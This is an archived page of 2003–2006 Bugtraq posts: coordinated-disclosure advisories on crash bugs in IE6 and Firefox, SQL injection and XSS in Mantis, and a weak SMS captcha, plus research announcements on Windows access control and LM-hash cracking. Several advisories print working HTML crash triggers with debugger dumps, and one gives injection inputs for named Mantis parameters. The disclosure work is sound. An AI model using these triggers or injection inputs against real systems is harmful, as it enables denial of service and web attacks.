Multiple Vulnerabilities in MS IE 6.0 SP2

Recently, I discovered three vulnerabilities in Microsoft Internet
Explorer 6 SP2 with all patches applied. All of these bugs are located
in `mshtml.dll' and are caused by incorrect handling of specially
crafted HTML documents. The severity of the first security issue
(mshtml.dll#7d6d2db4) is low because it is a non-exploitable Null
Pointer Dereference vulnerability and leads to DoS. The second
(mshtml.dll#7d519030) and third (mshtml.dll#7d529d35) vulnerability
are similar and the Microsoft Security Response Center rated them as
critical because, on the face of it, they could produce an exploitable
memory corruption (see HTML Tag Memory Corruption Vulnerability -
CVE-2006-1188) with a variant of my PoC.

To satisfy the request of the Microsoft Security Response Center I'm
going to provide further details at a later date.

o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Disclosure Timeline:
=

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
11 Apr 06 - Vendor released security update.
12 Apr 06 - First advisory released.

o Solution:
==

Two of the mentioned vulnerabilities are addressed in the latest
security update for Internet Explorer [2]. I think - this is not an
official statement from the Microsoft Security Response Center - the
third security issue will be fixed in an upcoming service pack release.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060412-msie6-sp2.txt

[1] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPVbIkCo6/ctnOpYRA3XdAJ9C18OLBug0Gbfhcy2QhAXaQNkP6ACfdM1s
QIUo3pT6NBXkBnFtwGcYCWU=
=yG/7
-END PGP SIGNATURE-


Cantv/Movilnet's Web SMS vulnerability.

2006-03-28 Thread Bugtraq @ SNSecurity


Quick Summary:


Product : Movilnet's Web SMS.
Version : In-production versions.
Vendor : Movilnet - http://www.movilnet.com.ve/
Class : Remote
Criticality : High
Operating System(s) : N/A.

Synopsis


From Cantv's corporate webpage:
Cantv is the largest private company in Venezuela. Since its
privatization in 1991, the company has undergone a constant
transformation to become a competitive enterprise with high levels of
quality in its offering of voice and data transmission, internet access,
mobile telephony and information directory products and services.

Movilnet is an affiliate of Cantv, the largest private telecommunications
company in Venezuela.

Movilnet's Web SMS is a very popular Short Messages System that allows web
surfers to send short text messages directly to Movilnet's mobile phone
subscribers.

Notice


Movilnet's very popular Web SMS protects its mobile customers from SMS
bombs and undesirable spam using the mechanism pioneered by Blum's AI
group at Carnegie Mellon University that tries to tell humans and
computers apart by using programs known as captchas. Unfortunately,
Movilnet's captcha implementation is a very weak one and it is possible
to recognize its patterns 100% of the time. Others have previously
reported breaking scode-based captchas, however no proof of concept
source code has ever been released to the public.


Vendor Status


SNSecurity has contacted Movilnet, who already knew about the problem
and is currently dealing with the issue.

2/21/2006 Vendor is contacted about the vulnerability.
2/23/2006 Vendor informs the vulnerability was already known and asks
 for a 30 day period before publication.
3/17/2006 Vendor agrees to make the advisory public at the date agreed
 upon.
3/27/2006 Advisory is made public.

Basic Explanation


There are several problems with the scode-based captcha used by Movilnet
on their Web Short Message System. Most notoriously, the captcha's
challenge space is very small. Estimates performed by our research labs
indicate that only 16 Mb of memory would be required to store
pre-calculated data that would allow for a complete image-to-response
map.

Additionally, several other design flaws present in Movilnet's captcha
implementation allow for the creation of heuristic algorithms that would
not require data pre-calculation at all. The most important weaknesses
include: only one font, no color variation, useless perturbation, no
rotation and no deformation.

Proof Of Concept Status


No proof of concept will be released until the provider has sorted out the
issue.

Work Around


No workaround is possible to prevent abusers from spamming or SMS-bombing
mobile customers. If you are SMS-bombed you can only turn off your mobile
phone and ask a Movilnet representative to have your entire short text
message queue deleted.

Corrective Measures


Replace the captcha module for a stronger and more robust implementation.

Credits


This vulnerability was discovered by Ruben Recabarren and Leandro Leoncini
at SNSecurity's Research Lab.

Disclaimer
--
This advisory was released by SNSecurity as a matter of notification to
help administrators protect their systems and to warn mobile customers
against the described vulnerability. Exploit source code is never released
in our advisories but can be obtained under contract. Contact our sales
department at info (at) snsecurity (dot) com for further information on how
to obtain proof of concept code.

--
SNSecurity. http://www.snsecurity.com


Re: Various router DoS

2006-03-07 Thread bugtraq
I've sent this issue to Linksys referencing this post, as I have the
problem myself.


Re: linksys router + irc DoS

2006-03-06 Thread bugtraq
Which model of the WRT54G did you test on?

The reason I'm asking is that there are 5 different models (and a few subset 
models too), and only the newest (version 5) run VXWorks, whereas the rest run 
Linux - so it'd be nice to know where the problem is.

Thanks.

-m


[BuHa-Security] DoS Vulnerability in Firefox = 1.0.7

2006-02-21 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #8 |Feb 15th, 2006 |
 ---
| Vendor   | Mozilla Firefox|
| URL  | http://www.mozilla.com/firefox/|
| Version  | = 1.0.7   |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---

This issue was originally (?) discovered by Yuan Qi who posted it on
Bugzilla [1] on 11th November 2004 [2]. I rediscovered this
vulnerability on 1st October 2005 and reported it several weeks later
to the Mozilla Software Foundation [3] because I did not find any
advisory or bugzilla post about this problem.

I decided to release an advisory about this DoS vulnerability, even
though it's an old issue.

o Description:
=

The award-winning Web browser is better than ever. Browse the Web
with confidence - Firefox protects you from viruses, spyware and
pop-ups. Enjoy improvements to performance, ease of use and privacy.

Visit http://www.mozilla.com/firefox/ for detailed information.

o Denial of Service:
===

Following HTML code forces Firefox to crash:
 <frameset></frameset>
 <table><p><form><map><dl><table><small>

Online-demo:
http://morph3us.org/security/pen-te...8143204906.html

The access violation results in a null pointer dereference and is not
exploitable.

o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 Firefox 1.0.7 - GNU/Linux (Gentoo, Slackware, Debian)
 Firefox 1.0.7 - Solaris
 Firefox 1.0.7 - Windoze 2k / XP SP2
 Firefox 1.0.6 - XP SP2
 Firefox 1.0.4 - GNU/Linux (Gentoo, Slackware, Debian)
 Firefox 1.0.4 - XP SP2
 Firefox 1.0.1 - XP SP2
 Firefox 1.0.0 - XP SP2

o Disclosure Timeline:
=

01 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
15 Feb 06 - Public release.

o Solution:
==

Upgrade to Firefox 1.5.0.1.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, nait, trappy and all members
of BuHa.

Advisory online:
http://morph3us.org/advisories/20060215-firefox-107.txt

[1] https://bugzilla.mozilla.org/
[2] https://bugzilla.mozilla.org/show_bug.cgi?id=269095
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=320463


-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFD8tg/kCo6/ctnOpYRAz27AJsE1EcyIycMA5XdDnHMJDdhPPk0uQCeK7DX
H+dtwjsf4nkXuHrPR1wFZZM=
=IUWt
-END PGP SIGNATURE-


[BuHa-Security] Multiple Vulnerabilities in Mantis 1.00rc4

2006-02-15 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #7 |Feb 14th, 2006 |
 ---
| Vendor   | Mantis BT  |
| URL  | http://www.mantisbt.org/   |
| Version  | = Mantis 1.00rc4  |
| Risk | Moderate   |
 ---

o Description:
=

Mantis is a web-based bugtracking system. It is written in the PHP
scripting language and requires the MySQL database and a webserver.

Visit http://www.mantisbt.org/ for detailed information.

o SQL-Injection:
===

  /manage_user_page.php:
GET: ?sort=last_visit'

The manipulated data of the sort parameter is saved into the
MANTIS_MANAGE_COOKIE cookie. The value of the cookie is inserted
into a SQL query and every time the page is loaded a MySQL database
error is displayed.

  You have an error in your SQL syntax; check the manual that
  corresponds to your MySQL server version for the right syntax
  to use near '\ ASC' at line 4 for the query:
  SELECT *
  FROM mantis_user_table
  WHERE (1 = 1)
  ORDER BY last_visit\' AS

Unexploitable SQL-Injection, temporary defacement.

o XSS:
=

  /view_all_set.php:
GET: ?type=1&handler_id=1&hide_status=[XSS]
GET: ?type=1&handler_id=[XSS]
GET: ?type=1&temporary=y&user_monitor=[XSS]
GET: ?type=1&temporary=y&reporter_id=[XSS]
GET: ?type=6&view_type=[XSS]
GET: ?type=1&show_severity=[XSS]
GET: ?type=1&show_category=[XSS]
GET: ?type=1&show_status=[XSS]
GET: ?type=1&show_resolution=[XSS]
GET: ?type=1&show_build=[XSS]
GET: ?type=1&show_profile=[XSS]
GET: ?type=1&show_priority=[XSS]
GET: ?type=1&highlight_changed=[XSS]
GET: ?type=1&relationship_type=[XSS]
GET: ?type=1&relationship_bug=[XSS]

  /manage_user_page.php:
GET: ?sort=[XSS]

  /view_filters_page.php:
GET: /view_filters_page.php?view_type=[XSS]

  /proj_doc_delete.php:
GET: ?file_id=1&title=[XSS]

o Disclosure Timeline:
=

08 Oct 05 - Security flaws discovered.
17 Nov 05 - Vendor contacted.
15 Dec 05 - Vendor contacted again.
18 Dec 05 - Vendor confirmed vulnerabilities.
18 Dec 05 - Vendor released partly bugfixed version.
19 Dec 05 - Vendor contacted again.
03 Feb 06 - Vendor released bugfixed version.
14 Feb 06 - Public release.

o Solution:
==

Upgrade to Mantis 1.0.0. [1]

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, nait, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060214-mantis-100rc4.txt

[1] http://www.mantisbt.org/download.php

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFD8qCZkCo6/ctnOpYRA3OmAJkBblkaWsqm4Gsmd1kmZmfSiE0tdgCgkPXw
Yw3XgTq5MxLHSGX7hExkDpQ=
=nRmi
-END PGP SIGNATURE-


Windows Access Control Demystified

2006-01-31 Thread sudhakar+bugtraq

Hello everybody,

We have constructed a logical model of Windows XP access control, in a 
declarative but executable (Datalog) format. We have built a scanner that 
reads access-control configuration information from the Windows registry, file 
system, and service control manager database, and feeds raw configuration data 
to the model. Therefore we can reason about such things as the existence of 
privilege-escalation attacks, and indeed we have found several 
user-to-administrator vulnerabilities caused by misconfigurations of the 
access-control lists of commercial software from several major vendors. We 
propose tools such as ours as a vehicle for software developers and system 
administrators to model and debug the complex interactions of access control on 
installations under Windows.


The full version of the paper can be found at:

http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf


All the vendors and CERT are aware of this paper. The bugs are *not* 
remotely exploitable. The CERT id is VU#953860.


regards,
Sudhakar Govindavajhala and Andrew Appel.

Bio:

Sudhakar Govindavajhala is a finishing PhD student at the Computer Science 
department, Princeton University. His interests are computer security, 
operating systems and networks. Sudhakar is looking for employment 
opportunities.


Andrew Appel is a Professor of Computer Science at Princeton University. He is 
currently on sabbatical at INRIA Rocquencourt. His interests are computer 
security, compilers, programming languages, type theory, and functional 
programming.



[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1

2005-12-27 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #4 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: mshtml.dll#7d663471
===

Following HTML code forces M$ IE 6 to crash:
 <table datasrc=".">

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html

These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi= eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

7d663469 8bff mov edi,edi
7d66346b 55   pushebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110   mov eax,[ecx+0x10]
FAULT -7d663471 66833823 cmp word ptr [eax],0x23   
ds:0023:=
7d663475 7405 jz  mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40   inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508   pushdword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002   add eax,0x2
7d663484 50   pusheax
7d663485 e8466cebff   callmshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c 
(7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 testeax,eax
7d663495 0f9cc1   setlcl
7d663498 8bc1 mov eax,ecx
7d66349a 5d   pop ebp
7d66349b c20400   ret 0x4

The access violation results in a null pointer dereference and is not 
exploitable. 

M$ IE parses the attribute value of 'datasrc' ([n].[m]) in the 
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')

The reason for the crash is that the 0 byte long [n] (no memory is allocated 
for this string) is used without any validation.

For example:
 char *t = NULL;    /* the zero-length [n]: no buffer was allocated */

 if(t[0] == 0x23)   /* reading t[0] dereferences a null pointer */


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 M$ IE 6.0  - Windoze XP Pro SP2
 M$ IE 6.0  - Windoze 2k SP4
 M$ IE 5.5  - Windoze XP Pro SP2
 M$ IE 5.01 - Windoze XP Pro SP2


o Disclosure Timeline:
=

10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke [EMAIL PROTECTED]

- --

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt 

-BEGIN PGP SIGNATURE-
Version: n/a   
Comment: http://morph3us.org/

iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-END PGP SIGNATURE-
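The datasrc handling described in the advisory above (split the value at '.', then compare the first character of [n] with 0x23), modelled in C once without and once with the check that was missing. This is an added illustration, not mshtml.dll's code; datasrc_head, unsafe_head_is_hash and safe_head_is_hash are hypothetical names, and, following the advisory, the model gives an empty [n] no buffer at all.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration, not mshtml.dll's code: a model of the datasrc split
 * the advisory describes, with and without the check that was missing.
 * datasrc_head, unsafe_head_is_hash and safe_head_is_hash are hypothetical
 * names chosen here. */

/* Copy [n] out of "[n].[m]". Following the advisory, an empty [n] gets no
 * buffer at all: the function returns NULL for it (and on malloc failure). */
static char *datasrc_head(const char *value)
{
    const char *dot = strchr(value, '.');
    size_t n = dot ? (size_t)(dot - value) : strlen(value);
    char *head;

    if (n == 0)
        return NULL;                 /* zero-length [n]: nothing allocated */
    head = malloc(n + 1);
    if (head == NULL)
        return NULL;
    memcpy(head, value, n);
    head[n] = '\0';
    return head;
}

/* The pattern behind the crash: [n] is used without validation. With a
 * value such as ".col" head is NULL and head[0] dereferences a null
 * pointer, the same kind of null read the register dump above shows. */
int unsafe_head_is_hash(const char *value)
{
    char *head = datasrc_head(value);
    int hit = (head[0] == 0x23);     /* '#'; crashes when head == NULL */

    free(head);
    return hit;
}

/* Hardened form: 1 if [n] starts with '#', 0 if not, -1 when there is no
 * [n] to inspect (empty head or allocation failure). */
int safe_head_is_hash(const char *value)
{
    char *head = datasrc_head(value);
    int hit;

    if (head == NULL)
        return -1;
    hit = (head[0] == 0x23);
    free(head);
    return hit;
}

int main(void)
{
    /* Constructed attribute values; "." is the crashing one from the post. */
    const char *samples[] = { "#tbl.col", "tbl.col", "." };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-10s -> %d\n", samples[i], safe_head_is_hash(samples[i]));
    return 0;
}
```

The hardened function reports "no [n] present" as a distinct result instead of touching memory that was never allocated; a caller that treats -1 as "not a '#' reference" gets the advisory's crash case handled without any special knowledge of how the string was stored.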


[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2

2005-12-27 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #5 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Read Dereference)  |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: mshtml.dll#7d6c74b1
===

Following HTML code forces M$ IE 6 to crash:
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
 </samp></colgroup><ul><font><menu> <code> <var>
 <sub><h2></fieldset>
 </kbd></frameset>
 </ins></map></noframes>
 </isindex>
 </code>
 </div></title>
 </del></var><isindex>
 <i>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=0001 edx=012945f0 esi=
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=  efl=0246

7d6c748b 6a0b push0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59   pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8   mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228   mov [edx+0x28],esi
7d6c749c e9af01   jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728   mov eax,[edi+0x28]
7d6c74a4 8b7028   mov esi,[eax+0x28]
7d6c74a7 897728   mov [edi+0x28],esi
7d6c74aa 8b4320   mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT -7d6c74b1 8b4e24   mov ecx,[esi+0x24]
  ds:0023:0024=
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8   neg ax
7d6c74bf 897510   mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40   inc eax
7d6c74c5 50   pusheax
7d6c74c6 e80c8efeff   callmshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0   movzx   eax,al
7d6c74ce 48   dec eax
7d6c74cf 83f80c   cmp eax,0xc
7d6c74d2 0f877b01 jnbemshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d   jmp dword ptr [mshtml+0x2179c7
  (7d6c79c7)+eax*4]
7d6c74df 8b4e20   mov ecx,[esi+0x20]
7d6c74e2 f6410208 testbyte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz  mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc   mov eax,[ebp-0x4]
7d6c74eb ff7014   pushdword ptr [eax+0x14]
7d6c74ee 8b4610   mov eax,[esi+0x10]
7d6c74f1 03460c   add eax,[esi+0xc]
7d6c74f4 50   pusheax
7d6c74f5 e899ba0100   callmshtml+0x232f93 (7d6e2f93)

It appears to be a null read dereference crash which is not exploitable.


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 M$ IE 6 SP2 - Win XP Pro SP2
 M$ IE 6 - Win 2k SP4


o Disclosure Timeline:
=

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke [EMAIL PROTECTED]

- --

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-END PGP 

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3

2005-12-27 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #6 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: mshtml.dll#7d6d8eba
===

Following HTML code forces M$ IE 6 to crash:
 <acronym><dd><h5><applet></caption></applet><li></h1>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01295390 ecx= edx= esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea400 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57   pushedi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff   callmshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d   push0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff   callmshtml+0x8464d (7d53464d)
7d6d8eb2 50   pusheax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff   callmshtml+0x207a99 (7d6b7a99)
FAULT -7d6d8eba 668b500c mov dx,[eax+0xc]
  ds:0023:000c=
7d6d8ebe 6685d2   testdx,dx
7d6d8ec1 7c39 jl  mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01   cmp dword ptr [mshtml+0x29e350
  (7d74e350)],0x1
7d6d8eca 0fbffa   movsx   edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d   mov eax,[mshtml+0x29e34c
  (7d74e34c)]
7d6d8ed4 8b484c   mov ecx,[eax+0x4c]
7d6d8ed7 8b4134   mov eax,[ecx+0x34]
7d6d8eda 8d147f   lea edx,[edi+edi*2]
7d6d8edd 8b3c90   mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)

The access violation results in a null pointer dereference and is not 
exploitable. 


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
 M$ IE 6 SP2 - Win XP Pro SP2
 M$ IE 6 - Win 2k SP4


o Disclosure Timeline:
=

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke [EMAIL PROTECTED]

- --

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-END PGP SIGNATURE-


WELCOME to bugtraq@securityfocus.com

2005-10-28 Thread bugtraq-help
Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.

I'm working for my owner, who can be reached
at [EMAIL PROTECTED]

Acknowledgment: I have added the address

   archive@mail-archive.com

to the bugtraq mailing list.

Welcome to [EMAIL PROTECTED]

Please save this message so that you know the address you are
subscribed under, in case you later want to unsubscribe or change your
subscription address.

To unsubscribe, send a message to:

[EMAIL PROTECTED]

Please, read the list FAQ. Its available at 
http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml

David Ahmad
[EMAIL PROTECTED]

--- Administrative commands for the bugtraq list ---

I can handle administrative requests automatically. Please
do not send them to the list address! Instead, send
your message to the correct command address:

For help and a description of available commands, send a message to:
   [EMAIL PROTECTED]

To subscribe to the list, send a message to:
   [EMAIL PROTECTED]

To remove your address from the list, just send a message to
the address in the ``List-Unsubscribe'' header of any list
message. If you haven't changed addresses since subscribing,
you can also send a message to:
   [EMAIL PROTECTED]

or for the digest to:
   [EMAIL PROTECTED]

For addition or removal of addresses, I'll send a confirmation
message to that address. When you receive it, simply reply to it
to complete the transaction.

If you need to get in touch with the human owner of this list,
please send a message to:

[EMAIL PROTECTED]

Please include a FORWARDED list message with ALL HEADERS intact
to make it easier to help you.

--- Enclosed is a copy of the request I received.

Return-Path: archive@mail-archive.com
Received: (qmail 5169 invoked from network); 28 Oct 2005 18:14:52 -
Received: from mail2.securityfocus.com (205.206.231.1)
  by lists2.securityfocus.com with SMTP; 28 Oct 2005 18:14:52 -
Received: (qmail 31179 invoked by alias); 29 Oct 2005 00:32:33 -
Received: (qmail 31175 invoked from network); 29 Oct 2005 00:32:33 -
Received: from www.mail-archive.com (64.62.136.189)
  by mail2.securityfocus.com with SMTP; 29 Oct 2005 00:32:33 -
Received: from www.mail-archive.com ([64.62.136.189]) by www.mail-archive.com
  via smtpd (for mail2.securityfocus.com [205.206.231.1]) with ESMTP; 
Fri, 28 Oct 2005 17:33:59 -0700
Received: from archive by localhost.localdomain with local (Exim 4.50)
id 1EVefW-0004JY-AD
for [EMAIL PROTECTED]; Fri, 28 Oct 2005 17:33:58 -0700
To: [EMAIL PROTECTED]
Subject: Re: confirm subscribe to bugtraq@securityfocus.com
Message-Id: [EMAIL PROTECTED]
From: archive@mail-archive.com
Date: Fri, 28 Oct 2005 17:33:58 -0700

To confirm that you would like


Cracking windows passwords in 5 seconds

2003-07-22 Thread bugtraq



As opposed to Unix, Windows password hashes can be calculated in advance 
because no salt or other random information is involved. This makes 
so-called time-memory trade-off attacks possible. This vulnerability is not 
new but we think that we have the first tool to exploit this.

At LASEC (lasecwww.epfl.ch) we have developed an advanced time-memory 
trade-off method. It is based on original work which was done in 1980 but 
has never been applied to windows passwords. It works by calculating all 
possible hashes in advance and storing some of them in an organized 
table. The more information you keep in the table, the faster the 
cracking will be.

We have implemented an online demo of this method which cracks 
alphanumerical passwords in 5 seconds on average (see 
http://lasecpc13.epfl.ch/ntcrack). With the help of 0.95GB of data we can 
find the password after an average of 4 million hash operations. A brute 
force cracker would need to calculate an average of 50% of all hashes, 
which amounts to about 40 billion hashes for alphanumerical passwords 
(lanman hash).

More info about the method can be found in a paper at 
http://lasecwww.epfl.ch/php_code/publications/search.php?ref=Oech03.

  Philippe Oechslin
